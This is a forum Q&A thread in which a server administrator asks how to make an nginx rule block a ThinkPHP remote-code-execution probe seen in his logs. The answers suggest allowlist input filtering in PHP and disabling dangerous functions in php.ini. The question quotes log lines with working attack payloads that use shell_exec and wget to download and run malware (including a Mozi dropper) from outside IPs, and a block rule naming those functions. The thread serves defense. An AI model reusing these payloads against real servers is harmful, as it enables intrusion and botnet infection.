PHP
fastboot, 2021-01-12 09:27:13

Nginx 1.10 php exploit through GET arguments, how to fix?

Example:

{"status": "400","ip": "87.117.152.116","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T06:14:30+02:00"}

Here is the request itself:
/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'


linux:
4.14.111 #1 SMP Thu Dec 19 15:23:22 CST 2019 armv7l armv7l armv7l GNU/Linux

There are no updates for nginx, the available version is 1.10.

FILE /etc/nginx/sites-enabled/default
if ($request_uri ~* "call_user_func_array|shell_exec|wget") {
    return 444;
}

When I send the request via curl from the LAN, the rule works, but for a request from outside it does not work?
curl -I --user-agent "Test" "http://192.168.255.249/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"

But if you look at this log:
{"status": "444","ip": "112.163.119.159","host": "95.153.111.12","path": "/shell?cd+/tmp;rm+-rf+*;wget+http://112.163.119.159:33790/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","referrer": "-","user_agent": "Hello, world","length": 0,"generation_time_milli": 0.000,"date": "2021-01-12T08:10:10+02:00"}

The rule with code 444 is already working here, but if you look at the trace log:
{"status": "400","ip": "170.246.86.201","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.239.242.76/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T08:24:18+02:00"}

then the code is 400.
How do I fix it?


2 answer(s)
xmoonlight, 2021-01-12
@xmoonlight

Regex-filter of all input user data according to the "white" list solves all issues once and for all.
Edit the php script handler for routing all incoming requests and add filtering there.
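
One way to apply the allowlist filtering suggested in the answer above, as an added example that is not part of the original thread. The parameter names, the patterns and the `rejectReason` helper are assumptions to be replaced with what the application really accepts.

```php
<?php
// Added example, not code from the thread. Parameter names and patterns are
// assumptions; list only what the application actually uses.

// Allowlist: each accepted GET parameter and the pattern its value must match.
const ALLOWED_PARAMS = [
    's'    => '~\A/?[a-z0-9_]+(?:/[a-z0-9_]+){0,2}\z~i', // route: module/controller/action
    'page' => '~\A[0-9]{1,6}\z~',                         // hypothetical pager argument
];

/**
 * Return null when the query passes the allowlist, otherwise the reason it
 * was rejected. Anything that is not explicitly allowed is refused.
 */
function rejectReason(array $query): ?string
{
    foreach ($query as $name => $value) {
        if (!array_key_exists($name, ALLOWED_PARAMS)) {
            return "unexpected parameter: $name";
        }
        if (!is_string($value)) {        // e.g. vars[1][]=... arrives as an array
            return "non-scalar value for: $name";
        }
        if (preg_match(ALLOWED_PARAMS[$name], $value) !== 1) {
            return "value not allowed for: $name";
        }
    }
    return null;
}

// Constructed samples: the parameters of the logged probe (command shortened)
// and a normal request.
$probe = [
    's'        => "/index/\x09hink\x07pp/invokefunction",
    'function' => 'call_user_func_array',
    'vars'     => ['shell_exec', ['wget ...']],
];
$normal = ['s' => '/index/news/view', 'page' => '2'];

foreach (['probe' => $probe, 'normal' => $normal] as $label => $query) {
    echo $label, ': ', rejectReason($query) ?? 'accepted', PHP_EOL;
}

// In the front controller, before any routing takes place:
// if (rejectReason($_GET) !== null) { http_response_code(400); exit; }
```

The probe is refused at its first parameter because the route value contains characters outside the pattern, and `function` and `vars` would be refused as unexpected names even with a clean route.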

Slava Rozhnev, 2021-01-12
@rozhnev

You can disable the execution of dangerous functions in PHP. Add the following line to php.ini:

; disable functions
disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
